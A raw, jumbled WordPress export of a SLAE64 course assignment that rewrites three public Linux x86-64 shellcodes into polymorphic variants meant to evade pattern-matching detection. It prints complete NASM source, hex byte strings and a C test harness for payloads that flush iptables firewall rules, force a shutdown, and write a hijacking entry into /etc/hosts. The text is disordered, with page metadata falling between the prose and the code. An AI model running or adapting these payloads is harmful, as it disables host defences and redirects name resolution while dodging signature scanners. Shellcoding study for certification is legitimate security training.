shellcode-683<\/h2>\nVersion 1<\/h3>\n
I’ve changed the original implementation by replacing the \u00ab\u00a0stack\u00a0\u00bb technique by the \u00ab\u00a0jmp call pop\u00a0\u00bb technique.<\/p>\n
Original size : 49 bytes<\/p>\n
Polymorphic version is smaller :\u00a0 43 bytes<\/strong><\/p>\n Original size : 49 bytes<\/p>\n Polymorphic version is larger :\u00a0 61\u00a0bytes but its size is < 150 % of the original size<\/strong><\/p>\n I’ve replaced :<\/p>\n <\/p>\n I’ve also changed the original implementation by replacing the \u00ab\u00a0stack\u00a0\u00bb technique by the \u00ab\u00a0jmp call pop\u00a0\u00bb technique.<\/p>\n Original size : 65 bytes<\/p>\n Polymorphic version is smaller : 60 bytes<\/strong><\/p>\n Original size : 65 bytes<\/p>\n Polymorphic version is larger :\u00a0 87 bytes but its size is < 150 % of the original size<\/strong><\/p>\n I’ve replaced :<\/p>\n I’ve also changed the original implementation by replacing the \u00ab\u00a0stack\u00a0\u00bb technique by the \u00ab\u00a0jmp call pop\u00a0\u00bb technique.<\/p>\n Original size : 110 bytes<\/p>\n Polymorphic version is smaller :\u00a0 101 bytes<\/strong><\/p>\n Here is a screenshot of this running shellcode :<\/p>\n Original size : 110 bytes<\/p>\n Polymorphic version is larger :\u00a0 144 bytes but its size is < 150 % of the original size<\/strong><\/p>\n I’ve replaced :<\/p>\n This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification : http:\/\/www.securitytube-\u00adtraining.com\/online-\u00adcourses\/x8664-\u00adassembly-\u00adand-\u00adshellcoding-\u00adon-\u00adlinux\/index.html Student ID: PA-6470 Assignment #6 The aim of this assignment is to take 3 shellcodes from shell-storm.org and to create a polymorphic version of them (to beat pattern-matching). I’ve chosen to rewrite the following shellcodes : … Continuer la lecture de SLAE64 – Assignment #6 – Polymorphic versions of shellcodes from Shell-Storm<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-216","post","type-post","status-publish","format-standard","hentry","category-slae64"],"_links":{"self":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/216","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=216"}],"version-history":[{"count":18,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/216\/revisions"}],"predecessor-version":[{"id":301,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/216\/revisions\/301"}],"wp:attachment":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=216"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=216"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=216"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}root@debian64:~\/shellcodes\/x64\/pentesteracademy\/Exam\/Assignment#6# for i in $(objdump -d shellcode-683-polymorphic -M intel |grep \"^ \" |cut -f2); do echo -n '\\x'$i; done;echo\r\n\\x48\\x31\\xc0\\x50\\x66\\x68\\x2d\\x46\\x48\\x89\\xe1\\xeb\\x0b\\x5f\\x50\\x51\\x57\\x48\\x89\\xe6\\xb0\\x3b\\x0f\\x05\\xe8\\xf0\\xff\\xff\\xff\\x2f\\x73\\x62\\x69\\x6e\\x2f\\x69\\x70\\x74\\x61\\x62\\x6c\\x65\\x73<\/pre>\n
; Author : SLAE64-PA-6470 (kahlon81)\r\n; Date : 2018\/02\/21\r\n;\r\n; Linux\/x86-64 - execve(\"\/sbin\/iptables\", [\"\/sbin\/iptables\", \"-F\"], NULL) - 43 bytes\r\n;\r\n; nasm -f elf64 shellcode-683-polymorphic.nasm -o shellcode-683-polymorphic.o\r\n; ld shellcode-683-polymorphic.o -o shellcode-683-polymorphic\r\n; \r\n; Original shellcode :\r\n;\r\n; http:\/\/shell-storm.org\/shellcode\/files\/shellcode-683.php\r\n;\r\n; Title: Linux\/x86-64 - execve(\"\/sbin\/iptables\", [\"\/sbin\/iptables\", \"-F\"], NULL) - 49 bytes\r\n; Author: 10n1z3d <10n1z3d[at]w[dot]cn>\r\n; Date: Fri 09 Jul 2010 03:26:12 PM EEST\r\n \r\nsection .text\r\nglobal _start\r\n \r\n_start:\r\n xor rax, rax\r\n push rax\r\n push word 0x462d\r\n mov rcx, rsp\r\n\r\njmp call_shellcode \r\nshellcode:\r\n pop rdi\r\n\r\n push rax\r\n push rcx\r\n push rdi\r\n mov rsi, rsp\r\n \r\n mov al, 0x3b\r\n syscall\r\n\r\ncall_shellcode:\r\n call shellcode\r\n iptables: db '\/sbin\/iptables'<\/pre>\n
Version 2<\/h3>\n
\n
; Author : SLAE64-PA-6470 (kahlon81)\r\n; Date : 2018\/02\/21\r\n; \r\n; nasm -f elf64 shellcode-683-polymorphic2.nasm -o shellcode-683-polymorphic2.o\r\n; ld shellcode-683-polymorphic2.o -o shellcode-683-polymorphic2\r\n;\r\n; Title: Linux\/x86-64 - execve(\"\/sbin\/iptables\", [\"\/sbin\/iptables\", \"-F\"], NULL) - 49 bytes\r\n \r\n \r\n; Source Code (NASM):\r\n \r\nsection .text\r\n\r\nglobal _start\r\n \r\n_start:\r\n; xor rax, rax\r\nmov rbx, rax\r\nsub rax, rbx<\/strong> \r\n \r\npush rax\r\n\r\npush word 0x462d\r\nmov rcx, rsp\r\n \r\nmov rbx, 0x73656c626174ffff\r\nshr rbx, 0x10\r\n\r\n; push rbx\r\nmov qword [rsp - 8], rbx\r\nsub rsp, 8<\/strong>\r\n \r\nmov rbx, 0x70692f6e6962732f\r\npush rbx\r\n\r\nmov rdi, rsp\r\n \r\npush rax\r\npush rcx\r\npush rdi\r\n\r\nmov rsi, rsp\r\n \r\n; execve(\"\/sbin\/iptables\", [\"\/sbin\/iptables\", \"-F\"], NULL);\r\nmov al, 0x3b\r\nsyscall<\/pre>\n
shellcode-877<\/h2>\n
Version 1<\/h3>\n
root@debian64:~\/shellcodes\/x64\/pentesteracademy\/Exam\/Assignment#6# for i in $(objdump -d shellcode-877-polymorphic -M intel |grep \"^ \" |cut -f2); do echo -n '\\x'$i; done;echo\r\n\\x48\\x31\\xc0\\x48\\x31\\xd2\\x50\\x6a\\x77\\x66\\x68\\x6e\\x6f\\x48\\x89\\xe3\\x50\\x66\\x68\\x2d\\x68\\x48\\x89\\xe1\\x50\\xeb\\x0e\\x5f\\x52\\x53\\x51\\x57\\x48\\x89\\xe6\\x48\\x83\\xc0\\x3b\\x0f\\x05\\xe8\\xed\\xff\\xff\\xff\\x2f\\x73\\x62\\x69\\x6e\\x2f\\x73\\x68\\x75\\x74\\x64\\x6f\\x77\\x6e<\/pre>\n
; Author : SLAE64-PA-6470 (kahlon81)\r\n; Date : 2018\/02\/21\r\n;\r\n; Linux\/x86-64 - shutdown -h now x86_64 Shellcode - 60 bytes\r\n;\r\n; nasm -f elf64 shellcode-877-polymorphic.nasm -o shellcode-877-polymorphic.o\r\n; ld shellcode-877-polymorphic.o -o shellcode-877-polymorphic\r\n;\r\n; Original shellcode :\r\n;\r\n; http:\/\/shell-storm.org\/shellcode\/files\/shellcode-877.php\r\n;\r\n; Title: shutdown -h now x86_64 Shellcode - 65 bytes\r\n; Platform: linux\/x86_64\r\n; Date: 2014-06-27\r\n; Author: Osanda Malith Jayathissa (@OsandaMalith)\r\n\r\nsection .text\r\n\r\nglobal _start\r\n\r\n_start:\r\n\r\n xor rax, rax\r\n xor rdx, rdx \r\n\r\n push rax\r\n push byte 0x77\r\n push word 0x6f6e ; now\r\n mov rbx, rsp\r\n\r\n push rax\r\n push word 0x682d ;-h\r\n mov rcx, rsp\r\n\r\n push rax\r\n\r\n jmp call_shellcode \r\nshellcode:\r\n pop rdi\r\n\r\n push rdx\r\n push rbx\r\n push rcx\r\n push rdi\r\n mov rsi, rsp\r\n\r\n add rax, 59\r\n syscall\r\ncall_shellcode:\r\n call shellcode\r\n shutdown: db '\/sbin\/shutdown'<\/pre>\n
\/*\r\n*\r\n* Author : SLAE64-PA-6470 (kahlon81)\r\n* Date : 2018\/02\/21\r\n*\r\n* Linux\/x86-64 - shutdown -h now x86_64 Shellcode - 60 bytes\r\n*\r\n* for i in $(objdump -d shellcode-877-polymorphic.o -M intel |grep \"^ \" |cut -f2); do echo -n '\\x'$i; done;echo\r\n*\r\n* gcc -fno-stack-protector -z execstack shellcode-877-polymorphic.c -o shellcode-877-poly\r\n*\r\n*\/\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\nunsigned char code[] = \"\\x48\\x31\\xc0\\x48\\x31\\xd2\\x50\\x6a\\x77\\x66\\x68\\x6e\\x6f\\x48\\x89\\xe3\\x50\\x66\\x68\\x2d\\x68\\x48\\x89\\xe1\\x50\\xeb\\x0e\\x5f\\x52\\x53\\x51\\x57\\x48\\x89\\xe6\\x48\\x83\\xc0\\x3b\\x0f\\x05\\xe8\\xed\\xff\\xff\\xff\\x2f\\x73\\x62\\x69\\x6e\\x2f\\x73\\x68\\x75\\x74\\x64\\x6f\\x77\\x6e\";\r\n\r\nmain()\r\n{\r\n\r\n\tprintf(\"Shellcode Length: %d\\n\", (int)strlen(code));\r\n\r\n\tint (*ret)() = (int(*)())code;\r\n\r\n\tret();\r\n\r\n}<\/pre>\nVersion 2<\/h3>\n
\n
; Author : SLAE64-PA-6470 (kahlon81)\r\n; Date : 2018\/02\/21\r\n\r\n; nasm -f elf64 shellcode-877-polymorphic2.nasm -o shellcode-877-polymorphic2.o\r\n; ld shellcode-877-polymorphic2.o -o shellcode-877-polymorphic2\r\n\r\n; Title: shutdown -h now x86_64 Shellcode - 65 bytes\r\n; Platform: linux\/x86_64\r\n; Date: 2014-06-27\r\n; Original Author: Osanda Malith Jayathissa (@OsandaMalith)\r\n\r\nsection .text\r\n\r\nglobal _start\r\n\r\n_start:\r\n\r\n;xor rax, rax\r\nmov rbx, rax\r\nsub rax, rbx<\/strong>\r\n\r\nxor rdx, rdx \r\n\r\n; dummy instruction\r\nxor r9, r9\r\nadd r9b, 0x33<\/strong>\r\n\r\n;push rax\r\nmov qword [rsp - 8], rax\r\nsub rsp, 8\r\n\r\npush byte 0x77\r\npush word 0x6f6e ; now\r\nmov rbx, rsp\r\n\r\npush rax\r\npush word 0x682d ;-h\r\nmov rcx, rsp\r\n\r\n; dummy instruction\r\nsub r9b, 0x12<\/strong>\r\n\r\npush rax\r\nmov r8, 0x2f2f2f6e6962732f ; \/sbin\/shutdown\r\nmov r10, 0x6e776f6474756873\r\npush r10\r\npush r8\r\nmov rdi, rsp\r\n\r\npush rdx\r\npush rbx\r\npush rcx\r\npush rdi\r\nmov rsi, rsp\r\n\r\nadd rax, 59\r\n\r\nsyscall<\/pre>\n
<\/h2>\n
shellcode-896<\/h2>\n
Version 1<\/h3>\n
root@debian64:~\/shellcodes\/x64\/pentesteracademy\/Exam\/Assignment#6# for i in $(objdump -d shellcode-896-polymorphic -M intel |grep \"^ \" |cut -f2); do echo -n '\\x'$i; done;echo\r\n\\x48\\x31\\xc0\\x48\\x83\\xc0\\x02\\x48\\x31\\xff\\x48\\x31\\xf6\\x56\\xeb\\x46\\x5f\\x48\\x31\\xf6\\x66\\x81\\xc6\\x01\\x04\\x0f\\x05\\x48\\x97\\x48\\x31\\xc0\\x48\\x83\\xc0\\x01\\xeb\\x18\\x5e\\xb2\\x13\\x0f\\x05\\x48\\x31\\xc0\\x48\\x83\\xc0\\x03\\x0f\\x05\\x48\\x31\\xc0\\xb0\\x3c\\x48\\x31\\xff\\x0f\\x05\\xe8\\xe3\\xff\\xff\\xff\\x31\\x32\\x37\\x2e\\x31\\x2e\\x31\\x2e\\x31\\x20\\x67\\x6f\\x6f\\x67\\x6c\\x65\\x2e\\x6c\\x6b\\xe8\\xb5\\xff\\xff\\xff\\x2f\\x65\\x74\\x63\\x2f\\x68\\x6f\\x73\\x74\\x73<\/pre>\n
; Author : SLAE64-PA-6470 (kahlon81)\r\n; Date : 2018\/02\/21\r\n;\r\n; Linux\/x86-64 - Add map in \/etc\/hosts file - 102 bytes\r\n;\r\n; nasm -f elf64 shellcode-896-polymorphic.nasm -o shellcode-896-polymorphic.o\r\n; ld shellcode-896-polymorphic.o -o shellcode-896-polymorphic\r\n;\r\n; Title: Add map in \/etc\/hosts file - 110 bytes\r\n; Date: 2014-10-29\r\n; Platform: linux\/x86_64\r\n; Website: http:\/\/osandamalith.wordpress.com\r\n; Author: Osanda Malith Jayathissa (@OsandaMalith)\r\n\r\nglobal _start\r\n section .text\r\n\r\n_start:\r\n ;open\r\n xor rax, rax \r\n add rax, 2 ; open syscall\r\n xor rdi, rdi\r\n xor rsi, rsi\r\n push rsi ; 0x00 \r\n \r\n jmp call_shellcode \r\nshellcode:\r\n pop rdi\r\n\r\n xor rsi, rsi\r\n add si, 0x401\r\n syscall\r\n\r\n ;write\r\n xchg rax, rdi\r\n xor rax, rax\r\n add rax, 1 ; syscall for write\r\n jmp data\r\n\r\nwrite:\r\n pop rsi \r\n mov dl, 19 ; length in rdx\r\n syscall\r\n\r\n ;close\r\n xor rax, rax\r\n add rax, 3\r\n syscall\r\n\r\n ;exit\r\n xor rax, rax\r\n mov al, 60\r\n xor rdi, rdi\r\n syscall \r\n\r\ndata:\r\n call write\r\n text db '127.1.1.1 google.lk'\r\ncall_shellcode:\r\n call shellcode\r\n hosts: db '\/etc\/hosts'<\/pre>\n
![\"\"](\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/02\/slae64-6-3.png\")
<\/p>\nVersion 2<\/h3>\n
\n
; Author : SLAE64-PA-6470 (kahlon81)\r\n; Date : 2018\/02\/21\r\n; nasm -f elf64 shellcode-896-polymorphic2.nasm -o shellcode-896-polymorphic2.o\r\n; ld shellcode-896-polymorphic2.o -o shellcode-896-polymorphic2\r\n\r\n; Title: Add map in \/etc\/hosts file - 110 bytes\r\n; Date: 2014-10-29\r\n; Platform: linux\/x86_64\r\n; Website: http:\/\/osandamalith.wordpress.com\r\n; Original author: Osanda Malith Jayathissa (@OsandaMalith)\r\n\r\nglobal _start\r\n section .text\r\n\r\n_start:\r\n ;open\r\n xor rax, rax \r\n add rax, 2 ; open syscall\r\n xor rdi, rdi\r\n xor rsi, rsi\r\n push rsi ; 0x00\r\n \r\n ;mov r8, 0x2f2f2f2f6374652f ; stsoh\/\r\n mov rcx, 0x1f1f1f1f5364551f \r\n movq mm0, rcx \r\n mov rcx, 0x1010101010101010 \r\n movq mm1, rcx\r\n paddusb mm0, mm1 \r\n movq r8, mm0\r\n emms<\/strong> \r\n\r\n mov r10, 0x7374736f682f2f2f ; \/cte\/\r\n\r\n ;push r10\r\n mov qword [rsp - 8], r10\r\n sub rsp, 8<\/strong>\r\n\r\n push r8\r\n add rdi, rsp\r\n xor rsi, rsi\r\n add si, 0x401\r\n syscall\r\n\r\n ;write\r\n xchg rax, rdi\r\n xor rax, rax\r\n add rax, 1 ; syscall for write\r\n jmp data\r\n\r\nwrite:\r\n pop rsi \r\n mov dl, 19 ; length in rdx\r\n syscall\r\n\r\n ;close\r\n xor rax, rax\r\n add rax, 3\r\n syscall\r\n\r\n ;exit\r\n xor rax, rax\r\n mov al, 60\r\n xor rdi, rdi\r\n syscall \r\n\r\ndata:\r\n call write\r\n text db '127.1.1.1 google.lk'<\/pre>\n","protected":false},"excerpt":{"rendered":"